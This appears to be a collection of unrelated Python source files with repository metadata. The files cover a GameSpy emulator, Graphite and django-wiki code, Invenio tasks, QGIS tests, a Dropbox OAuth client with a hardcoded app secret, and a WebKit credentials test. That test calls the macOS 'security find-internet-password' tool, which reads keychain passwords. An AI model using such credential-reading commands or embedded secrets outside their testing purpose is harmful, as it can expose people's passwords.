# 0x0b, 0x00, 0x00, 0x00,
# 0x01, 0x04])):
if self.own_server is None and len(data) >= 16 and \
bytearray(data)[0:4] in (bytearray([0xbb, 0x49, 0xcc, 0x4d]),
bytearray([0x53, 0x42, 0x43, 0x4d])):
# Is the endianness the same between the DS and Wii here?
# It seems so but I'm not positive.
# Note to self: Port is little endian here.
self_port = utils.get_short(bytearray(data[10:12]), 0, False)
self_ip = '.'.join(["%d" % x for x in bytearray(data[12:16])])
self.own_server, _ = self.find_server_in_cache(self_ip,
self_port,
self.console)
if self.own_server is None:
if self.console == 0:
# Try Wii
self.own_server, _ = self.find_server_in_cache(
self_ip, self_port, 1
)
elif self.console == 1:
# Try DS
self.own_server, _ = self.find_server_in_cache(
self_ip, self_port, 0
)
if self.own_server is None:
self.log(logging.DEBUG,
"Could not find own server: %s:%d",
self_ip, self_port)
else:
self.log(logging.DEBUG,
"Found own server: %s",
self.own_server)
elif len(data) == 10 and \
bytearray(data)[0:6] == \
bytearray([0xfd, 0xfc, 0x1e, 0x66, 0x6a, 0xb2]):
natneg_session = utils.get_int_signed(data, 6)
self.log(logging.DEBUG,
"Adding %d to natneg server list: %s",
natneg_session, server)
# Store info in backend so we can get it later in natneg
self.server_manager.add_natneg_server(natneg_session, server)
if self.own_server is not None:
self.log(logging.DEBUG,
"Adding %d to natneg server list: %s (self)",
natneg_session, self.own_server)
# Store info in backend so we can get it later in natneg
self.server_manager.add_natneg_server(natneg_session,
self.own_server)
# if self.qr is not None:
# own_server = self.qr.get_own_server()
#
# self.log(logging.DEBUG,
# "Adding %d to natneg server list: %s",
# natneg_session, own_server)
# self.server_manager.add_natneg_server(natneg_session,
# own_server)
output = bytearray([0xfe, 0xfd, 0x06])
output += utils.get_bytes_from_int(server['__session__'])
output += bytearray(utils.get_bytes_from_int(cookie))
output += bytearray(data)
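            # Outgoing packet layout: the 0xfe 0xfd 0x06 magic bytes, the
            # server's __session__ value and the random cookie generated
            # above (both packed with utils.get_bytes_from_int), followed by
            # the client's original payload.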
if self.qr is not None:
self.log(logging.DEBUG,
"Forwarded data to %s:%s through QR server...",
forward_client[0], forward_client[1])
self.qr.socket.sendto(output, forward_client)
else:
# In case we can't contact the QR server, just try sending
# the packet directly. This isn't standard behavior but it
# can work in some instances.
self.log(logging.DEBUG,
"Forwarded data to %s:%s directly"
" (potential error occurred)...",
forward_client[0], forward_client[1])
client_s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client_s.sendto(output, forward_client)
if __name__ == "__main__":
server_browser = GameSpyServerBrowserServer()
server_browser.start()
|
sepalani/dwc_network_server_emulator
|
gamespy_server_browser_server.py
|
Python
|
agpl-3.0
| 25,121
|
"""Copyright 2008 Orbitz WorldWide
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
# Django settings for graphite project.
# DO NOT MODIFY THIS FILE DIRECTLY - use local_settings.py instead
from os.path import dirname, join, abspath
TEMPLATE_DIRS = (
    join(dirname(abspath(__file__)), 'templates'),
)
#Django settings below, do not touch!
APPEND_SLASH = False
TEMPLATE_DEBUG = False
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
},
}
# Language code for this installation. All choices can be found here:
# http://www.w3.org/TR/REC-html40/struct/dirlang.html#langcodes
# http://blogs.law.harvard.edu/tech/stories/storyReader$15
LANGUAGE_CODE = 'en-us'
# Absolute path to the directory that holds media.
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT.
# Example: "http://media.lawrence.com"
MEDIA_URL = ''
MIDDLEWARE_CLASSES = (
'graphite.middleware.LogExceptionsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.gzip.GZipMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'graphite.urls'
INSTALLED_APPS = (
'graphite.metrics',
'graphite.render',
'graphite.browser',
'graphite.composer',
'graphite.account',
'graphite.dashboard',
'graphite.whitelist',
'graphite.events',
'graphite.url_shortener',
'django.contrib.auth',
'django.contrib.sessions',
'django.contrib.admin',
'django.contrib.contenttypes',
'django.contrib.staticfiles',
'tagging',
)
AUTHENTICATION_BACKENDS = ['django.contrib.auth.backends.ModelBackend']
GRAPHITE_WEB_APP_SETTINGS_LOADED = True
|
bruce-lyft/graphite-web
|
webapp/graphite/app_settings.py
|
Python
|
apache-2.0
| 2,240
|
from __future__ import unicode_literals
from __future__ import absolute_import
from django.views.generic.base import TemplateResponseMixin
from wiki.core.plugins import registry
from wiki.conf import settings
class ArticleMixin(TemplateResponseMixin):
"""A mixin that receives an article object as a parameter (usually from a wiki
decorator) and puts this information as an instance attribute and in the
template context."""
def dispatch(self, request, article, *args, **kwargs):
self.urlpath = kwargs.pop('urlpath', None)
self.article = article
self.children_slice = []
if settings.SHOW_MAX_CHILDREN > 0:
try:
                for child in self.article.get_children(
                        max_num=settings.SHOW_MAX_CHILDREN + 1,
                        articles__article__current_revision__deleted=False,
                        user_can_read=request.user):
self.children_slice.append(child)
except AttributeError as e:
raise Exception(
"Attribute error most likely caused by wrong MPTT version. Use 0.5.3+.\n\n" +
str(e))
return super(ArticleMixin, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
kwargs['urlpath'] = self.urlpath
kwargs['article'] = self.article
kwargs['article_tabs'] = registry.get_article_tabs()
kwargs['children_slice'] = self.children_slice[:20]
kwargs['children_slice_more'] = len(self.children_slice) > 20
kwargs['plugins'] = registry.get_plugins()
return kwargs
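# A minimal usage sketch (hypothetical view, not part of this module): the
# mixin is typically combined with a Django class-based view, with a wiki
# decorator supplying the `article` argument that dispatch() expects.
#
#     from django.utils.decorators import method_decorator
#     from django.views.generic import TemplateView
#     from wiki.decorators import get_article
#
#     class ExampleArticleView(ArticleMixin, TemplateView):
#         template_name = "wiki/example.html"
#
#         @method_decorator(get_article(can_read=True))
#         def dispatch(self, request, article, *args, **kwargs):
#             return super(ExampleArticleView, self).dispatch(
#                 request, article, *args, **kwargs)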
|
Infernion/django-wiki
|
wiki/views/mixins.py
|
Python
|
gpl-3.0
| 1,668
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2014 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Uploader celery tasks."""
from workflow.engine import GenericWorkflowEngine as WorkflowEngine
from invenio.base.globals import cfg
from invenio.celery import celery
from invenio.modules.jsonalchemy.reader import Reader
from invenio.modules.records.api import Record
from invenio.modules.workflows.registry import workflows
from . import signals
from .errors import UploaderException
@celery.task
def translate(blob, master_format, kwargs=None):
"""Translate from the `master_format` to `JSON`.
    :param blob: String containing the input file.
    :param master_format: Format of the blob; it will be used to decide which
        reader to use.
:param kwargs: Arguments to be used by the reader.
See :class:`invenio.modules.jsonalchemy.reader.Reader`
:returns: The blob and the `JSON` representation of the input file created
by the reader.
"""
return (blob,
Reader.translate(blob, Record, master_format,
**(kwargs or dict())).dumps())
@celery.task
def run_workflow(records, name, **kwargs):
"""Run the uploader workflow itself.
:param records: List of tuples `(blob, json_record)` from :func:`translate`
:param name: Name of the workflow to be run.
    :param kwargs: Additional arguments to be used by the tasks of the workflow
    :returns: Typically the list of record ids that have been processed,
        although this value could be modified by the `post_tasks`.
"""
def _run_pre_post_tasks(tasks):
"""Helper function to run list of functions."""
for task in tasks:
task(records, **kwargs)
#FIXME: don't know why this is needed but IT IS!
records = records[0]
if name in cfg['UPLOADER_WORKFLOWS']:
workflow = workflows.get(name)
else:
raise UploaderException("Workflow {0} not in UPLOADER_WORKFLOWS".format(name))
_run_pre_post_tasks(workflow.pre_tasks)
wfe = WorkflowEngine()
wfe.setWorkflow(workflow.tasks)
wfe.setVar('options', kwargs)
wfe.process(records)
_run_pre_post_tasks(workflow.post_tasks)
signals.uploader_finished.send(uploader_workflow=name,
result=records, **kwargs)
return records
# @celery.task
# def error_handler(uuid):
# """@todo: Docstring for _error_handler.
#
# :uuid: @todo
# :returns: @todo
#
# """
# result = celery.AsyncResult(uuid)
# exc = result.get(propagate=False)
# print('Task %r raised exception: %r\n%r'
# % (uuid, exc, result.traceback))
# return None
__all__ = ('translate', 'run_workflow')
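# A minimal usage sketch (illustration only: the 'insert' workflow name and
# the `blob`/`marc21` values are assumptions, not defined in this module):
# the two tasks are meant to be chained so that the output of translate()
# becomes the records argument of run_workflow().
#
#     from celery import chain
#
#     chain(
#         translate.s(blob, 'marc21'),
#         run_workflow.s('insert'),
#     ).apply_async()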
|
Lilykos/invenio
|
invenio/modules/uploader/tasks.py
|
Python
|
gpl-2.0
| 3,385
|
import unittest
import os, sys, imp
from qgis import utils
from qgis.core import QgsVectorLayer, QgsField, QgsProject, QGis
from qgis.PyQt.QtCore import QVariant
from .qgis_models import set_up_interface
from mole3.qgisinteraction import layer_interaction as li
from mole3.qgisinteraction import plugin_interaction as pi
from mole3.tests.qgis_models import HybridLayer
class PstPluginInteractionTest(unittest.TestCase):
def create_layer_with_features(self, name, type='Polygon'):
v_layer_name = li.biuniquify_layer_name(name)
if type == 'Point':
v_layer = QgsVectorLayer('{}?crs=EPSG:3857'.format(type), v_layer_name, 'memory', False)
else:
v_layer = HybridLayer(type, v_layer_name)
provider = v_layer.dataProvider()
v_layer.startEditing()
attributes = [QgsField('COLOR_RED', QVariant.String),
QgsField('COLOR_GRE', QVariant.String),
QgsField('COLOR_BLU', QVariant.String),
QgsField('COLOR_ALP', QVariant.String)]
provider.addAttributes(attributes)
v_layer.commitChanges()
return v_layer
def add_pointsamplingtool_to_plugins(self):
plugin_folder = os.path.join(utils.plugin_paths[0], 'pointsamplingtool', '__init__.py')
self.assertTrue(os.path.exists(str(plugin_folder)), 'Path to plugin not found. ({})'.format(str(plugin_folder)))
sys.modules['pointsamplingtool'] = imp.load_source('pointsamplingtool', plugin_folder)
def setUp(self):
self.qgis_app, self.canvas, self.iface = set_up_interface()
utils.plugin_paths = [os.path.expanduser('~/.qgis2/python/plugins')]
utils.updateAvailablePlugins()
utils.loadPlugin('pointsamplingtool')
utils.iface = self.iface
utils.startPlugin('pointsamplingtool')
def tearDown(self):
if self.qgis_app is not None:
del(self.qgis_app)
def test_if_plugin_is_available(self):
self.assertNotEqual(utils.available_plugins, [], 'No plugins were loaded.')
self.assertIn('pointsamplingtool', utils.available_plugins)
def test_if_plugin_is_accessible(self):
self.add_pointsamplingtool_to_plugins()
psti = pi.PstInteraction(utils.iface)
self.assertIsNotNone(psti)
def test_if_all_fields_are_selected(self):
self.add_pointsamplingtool_to_plugins()
registry = QgsProject.instance()
point_layer = self.create_layer_with_features('point', 'Point')
poly_layer1 = self.create_layer_with_features('poly1')
poly_layer2 = self.create_layer_with_features('poly2')
registry.addMapLayer(point_layer)
registry.addMapLayer(poly_layer1)
registry.addMapLayer(poly_layer2)
psti = pi.PstInteraction(utils.iface)
psti.set_input_layer(point_layer.name())
selected_fields = psti.pst_dialog.fieldsTable
psti.select_and_rename_files_for_sampling()
fields_point = point_layer.dataProvider().fields()
fields_poly1 = poly_layer1.dataProvider().fields()
fields_poly2 = poly_layer2.dataProvider().fields()
rows_expected = fields_point.count() + fields_poly1.count() + fields_poly2.count()
self.assertEqual(selected_fields.rowCount(), rows_expected)
def test_if_field_names_are_unique(self):
self.add_pointsamplingtool_to_plugins()
registry = QgsProject.instance()
point_layer = self.create_layer_with_features('test_pointlayer', 'Point')
poly_layer1 = self.create_layer_with_features('test_polygonlayer1')
poly_layer2 = self.create_layer_with_features('test_polygonlayer2')
registry.addMapLayer(point_layer)
registry.addMapLayer(poly_layer1)
registry.addMapLayer(poly_layer2)
psti = pi.PstInteraction(utils.iface)
psti.set_input_layer(point_layer.name())
map = psti.select_and_rename_files_for_sampling()
appendix = ['R', 'G', 'B', 'a']
poly_fields = psti.pst_dialog.rastItems[poly_layer1.name()]
for i in range(1, len(poly_fields)):
self.assertEqual(poly_fields[i][1], '01{}_{}'.format(poly_layer1.name()[:6], appendix[i-1]))
poly_fields = psti.pst_dialog.rastItems[poly_layer2.name()]
for i in range(1, len(poly_fields)):
self.assertEqual(poly_fields[i][1], '02{}_{}'.format(poly_layer1.name()[:6], appendix[i-1]))
self.assertEqual(map[poly_layer1.name()], '01{}'.format(poly_layer1.name()[:6]))
self.assertEqual(map[poly_layer2.name()], '02{}'.format(poly_layer2.name()[:6]))
if __name__ == '__main__':
unittest.main()
|
UdK-VPT/Open_eQuarter
|
mole3/tests/plugin_interaction_test.py
|
Python
|
gpl-2.0
| 4,712
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# This file is part of utext
#
# Copyright (C) 2012-2016 Lorenzo Carbonell
# lorenzo.carbonell.cerezo@gmail.com
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import requests
import json
import os
from urllib.parse import urlencode
import random
import time
from .logindialog import LoginDialog
from . import comun
KEY = 'rlajhlfbdjlv7vq'
SECRET = '4hxohya6cyhvsdz'
class DropboxService(object):
def __init__(self, token_file):
self.session = requests.session()
self.request_token_url = \
'https://api.dropbox.com/1/oauth/request_token'
self.authorize_url = 'https://www.dropbox.com/1/oauth/authorize'
self.access_token_url = 'https://api.dropbox.com/1/oauth/access_token'
self.key = KEY
self.secret = SECRET
self.token_file = token_file
self.access_token = None
self.refresh_token = None
if os.path.exists(token_file):
f = open(token_file, 'r')
text = f.read()
f.close()
try:
data = json.loads(text)
self.oauth_token = data['oauth_token']
self.oauth_token_secret = data['oauth_token_secret']
except Exception as e:
print('Error')
print(e)
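    # The methods below implement the legacy OAuth 1.0 PLAINTEXT flow of the
    # Dropbox v1 API: get_request_token() -> get_authorize_url() for the user
    # to approve -> get_access_token(), after which every call is signed by
    # __do_request() via the oauth_* parameters it attaches.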
def get_request_token(self):
params = {}
params['oauth_consumer_key'] = KEY
params['oauth_timestamp'] = int(time.time())
params['oauth_nonce'] = ''.join(
[str(random.randint(0, 9)) for i in range(8)])
params['oauth_version'] = '1.0'
params['oauth_signature_method'] = 'PLAINTEXT'
params['oauth_signature'] = '%s&' % SECRET
response = self.session.request(
'POST', self.request_token_url, params=params)
if response.status_code == 200:
oauth_token_secret, oauth_token = response.text.split('&')
oauth_token_secret = oauth_token_secret.split('=')[1]
self.ts = oauth_token_secret
oauth_token = oauth_token.split('=')[1]
return oauth_token, oauth_token_secret
return None
def get_authorize_url(self, oauth_token, oauth_token_secret):
params = {}
params['oauth_token'] = oauth_token
params['oauth_callback'] = 'http://localhost'
return 'https://www.dropbox.com/1/oauth/authorize?%s' %\
(urlencode(params))
def get_access_token(self, oauth_token, secret):
params = {}
params['oauth_consumer_key'] = KEY
params['oauth_token'] = oauth_token
params['oauth_timestamp'] = int(time.time())
params['oauth_nonce'] = ''.join(
[str(random.randint(0, 9)) for i in range(8)])
params['oauth_version'] = '1.0'
params['oauth_signature_method'] = 'PLAINTEXT'
params['oauth_signature'] = '%s&%s' % (SECRET, secret)
response = self.session.request(
'POST', self.access_token_url, params=params)
print(response, response.status_code, response.text)
if response.status_code == 200:
oauth_token_secret, oauth_token, uid = response.text.split('&')
oauth_token_secret = oauth_token_secret.split('=')[1]
oauth_token = oauth_token.split('=')[1]
uid = uid.split('=')[1]
self.oauth_token = oauth_token
self.oauth_token_secret = oauth_token_secret
f = open(self.token_file, 'w')
f.write(json.dumps(
{'oauth_token': oauth_token,
'oauth_token_secret': oauth_token_secret}))
f.close()
return uid, oauth_token, oauth_token_secret
return None
def get_account_info(self):
ans = self.__do_request(
'GET', 'https://api.dropbox.com/1/account/info')
if ans.status_code == 200:
return ans.text
return None
def get_files(self):
url = 'https://api.dropbox.com/1/search/auto/'
ans = self.__do_request('GET', url, addparams={"query": "."})
if ans and ans.status_code == 200:
return json.loads(ans.text)
return None
def get_file(self, afile):
url = 'https://api-content.dropbox.com/1/files/auto/%s' % (afile)
ans = self.__do_request('GET', url)
if ans and ans.status_code == 200:
return ans.text
return None
def put_file(self, filename, content):
url = 'https://api-content.dropbox.com/1/files_put/auto/%s' % (
filename)
addparams = {}
addparams['overwrite'] = True
addheaders = {
'Content-type': 'multipart/related;boundary="END_OF_PART"',
'Content-length': str(len(content)),
'MIME-version': '1.0'}
ans = self.__do_request('POST', url, addheaders=addheaders,
addparams=addparams, data=content)
if ans is not None:
return ans.text
def __do_request(self, method, url, addheaders=None, data=None,
addparams=None, first=True, files=None):
params = {}
params['oauth_consumer_key'] = KEY
params['oauth_token'] = self.oauth_token
params['oauth_timestamp'] = int(time.time())
params['oauth_nonce'] = ''.join(
[str(random.randint(0, 9)) for i in range(8)])
params['oauth_version'] = '1.0'
params['oauth_signature_method'] = 'PLAINTEXT'
params['oauth_signature'] = '%s&%s' % (
SECRET, self.oauth_token_secret)
        # There are no base headers to merge into, so just use whatever the
        # caller supplied (may be None).
        headers = addheaders
if addparams is not None:
params.update(addparams)
if data:
response = self.session.request(method, url, data=data,
headers=headers,
params=params, files=files)
else:
response = self.session.request(method, url, headers=headers,
params=params, files=files)
print(response, response.status_code)
if response.status_code == 200 or response.status_code == 201:
return response
elif (response.status_code == 401 or response.status_code == 403) \
and first:
pass
return None
if __name__ == '__main__':
ds = DropboxService(comun.TOKEN_FILE)
if os.path.exists(comun.TOKEN_FILE):
print(ds.get_account_info())
print(ds.put_file(
'remarkable2.md',
'esto es un ejemplo del funcionamiento'))
ans = ds.get_file('remarkable2.md')
print('============')
print(ans)
else:
oauth_token, oauth_token_secret = ds.get_request_token()
authorize_url = ds.get_authorize_url(oauth_token, oauth_token_secret)
ld = LoginDialog(1024, 600, authorize_url)
ld.run()
oauth_token = ld.code
uid = ld.uid
ld.destroy()
if oauth_token is not None:
print(oauth_token, uid)
ans = ds.get_access_token(oauth_token, oauth_token_secret)
print(ans)
print(ds.get_account_info())
'''
print(ds.get_account_info())
print(ds.get_file('data'))
print(ds.put_file('/home/atareao/Escritorio/data'))
'''
exit(0)
|
atareao/utext
|
src/utext/services.py
|
Python
|
gpl-3.0
| 8,053
|
# -*- coding: utf-8 -*-
#
# PyWavelets documentation build configuration file, created by
# sphinx-quickstart on Sun Mar 14 10:46:18 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import re
import datetime
import jinja2.filters
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.append(os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.doctest', 'sphinx.ext.autodoc', 'sphinx.ext.todo',
'sphinx.ext.extlinks', 'numpydoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'PyWavelets'
copyright = jinja2.filters.do_mark_safe('2006-%s, <a href="https://groups.google.com/forum/#!forum/pywavelets">The PyWavelets Developers</a>' % datetime.date.today().year)
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
import pywt
version = re.sub(r'\.dev0+.*$', r'.dev', pywt.__version__)
release = pywt.__version__
print "PyWavelets (VERSION %s)" % (version,)
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
unused_docs = ['substitutions', ]
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
modindex_common_prefix = ['pywt.']
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'nature'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = 'PyWavelets Documentation'
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '_static/favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
html_sidebars = {
'**': ['localtoc.html', "relations.html", 'quicklinks.html', 'searchbox.html', 'editdocument.html'],
}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = False
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
html_use_opensearch = 'http://pywavelets.readthedocs.org'
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'PyWaveletsdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'PyWavelets.tex', 'PyWavelets Documentation',
'The PyWavelets Developers', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['substitutions.rst', ]
|
eriol/pywt
|
doc/source/conf.py
|
Python
|
mit
| 7,140
|
# Copyright (C) 2009 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import tempfile
import unittest
from webkitpy.common.net.credentials import Credentials
from webkitpy.common.system.executive import Executive
from webkitpy.common.system.outputcapture import OutputCapture
from webkitpy.common.system.user_mock import MockUser
from webkitpy.thirdparty.mock import Mock
from webkitpy.tool.mocktool import MockOptions
from webkitpy.common.system.executive_mock import MockExecutive
# FIXME: Other unit tests probably want this class.
class _TemporaryDirectory(object):
def __init__(self, **kwargs):
self._kwargs = kwargs
self._directory_path = None
def __enter__(self):
self._directory_path = tempfile.mkdtemp(**self._kwargs)
return self._directory_path
def __exit__(self, type, value, traceback):
os.rmdir(self._directory_path)
# Note: All tests should use this class instead of Credentials directly to avoid using a real Executive.
class MockedCredentials(Credentials):
def __init__(self, *args, **kwargs):
if 'executive' not in kwargs:
kwargs['executive'] = MockExecutive()
Credentials.__init__(self, *args, **kwargs)
class CredentialsTest(unittest.TestCase):
example_security_output = """keychain: "/Users/test/Library/Keychains/login.keychain"
class: "inet"
attributes:
0x00000007 <blob>="bugs.webkit.org (test@webkit.org)"
0x00000008 <blob>=<NULL>
"acct"<blob>="test@webkit.org"
"atyp"<blob>="form"
"cdat"<timedate>=0x32303039303832353233353231365A00 "20090825235216Z\000"
"crtr"<uint32>=<NULL>
"cusi"<sint32>=<NULL>
"desc"<blob>="Web form password"
"icmt"<blob>="default"
"invi"<sint32>=<NULL>
"mdat"<timedate>=0x32303039303930393137323635315A00 "20090909172651Z\000"
"nega"<sint32>=<NULL>
"path"<blob>=<NULL>
"port"<uint32>=0x00000000
"prot"<blob>=<NULL>
"ptcl"<uint32>="htps"
"scrp"<sint32>=<NULL>
"sdmn"<blob>=<NULL>
"srvr"<blob>="bugs.webkit.org"
"type"<uint32>=<NULL>
password: "SECRETSAUCE"
"""
def test_keychain_lookup_on_non_mac(self):
class FakeCredentials(MockedCredentials):
def _is_mac_os_x(self):
return False
credentials = FakeCredentials("bugs.webkit.org")
self.assertEqual(credentials._is_mac_os_x(), False)
self.assertEqual(credentials._credentials_from_keychain("foo"), ["foo", None])
def test_security_output_parse(self):
credentials = MockedCredentials("bugs.webkit.org")
self.assertEqual(credentials._parse_security_tool_output(self.example_security_output), ["test@webkit.org", "SECRETSAUCE"])
def test_security_output_parse_entry_not_found(self):
# FIXME: This test won't work if the user has a credential for foo.example.com!
credentials = Credentials("foo.example.com")
if not credentials._is_mac_os_x():
return # This test does not run on a non-Mac.
# Note, we ignore the captured output because it is already covered
# by the test case CredentialsTest._assert_security_call (below).
outputCapture = OutputCapture()
outputCapture.capture_output()
self.assertEqual(credentials._run_security_tool(), None)
outputCapture.restore_output()
def _assert_security_call(self, username=None):
executive_mock = Mock()
credentials = MockedCredentials("example.com", executive=executive_mock)
expected_stderr = "Reading Keychain for example.com account and password. Click \"Allow\" to continue...\n"
OutputCapture().assert_outputs(self, credentials._run_security_tool, [username], expected_stderr=expected_stderr)
security_args = ["/usr/bin/security", "find-internet-password", "-g", "-s", "example.com"]
if username:
security_args += ["-a", username]
executive_mock.run_command.assert_called_with(security_args)
def test_security_calls(self):
self._assert_security_call()
self._assert_security_call(username="foo")
def test_credentials_from_environment(self):
credentials = MockedCredentials("example.com")
saved_environ = os.environ.copy()
os.environ['WEBKIT_BUGZILLA_USERNAME'] = "foo"
os.environ['WEBKIT_BUGZILLA_PASSWORD'] = "bar"
username, password = credentials._credentials_from_environment()
self.assertEqual(username, "foo")
self.assertEqual(password, "bar")
os.environ = saved_environ
def test_read_credentials_without_git_repo(self):
# FIXME: This should share more code with test_keyring_without_git_repo
class FakeCredentials(MockedCredentials):
def _is_mac_os_x(self):
return True
def _credentials_from_keychain(self, username):
return ("test@webkit.org", "SECRETSAUCE")
def _credentials_from_environment(self):
return (None, None)
with _TemporaryDirectory(suffix="not_a_git_repo") as temp_dir_path:
credentials = FakeCredentials("bugs.webkit.org", cwd=temp_dir_path)
# FIXME: Using read_credentials here seems too broad as higher-priority
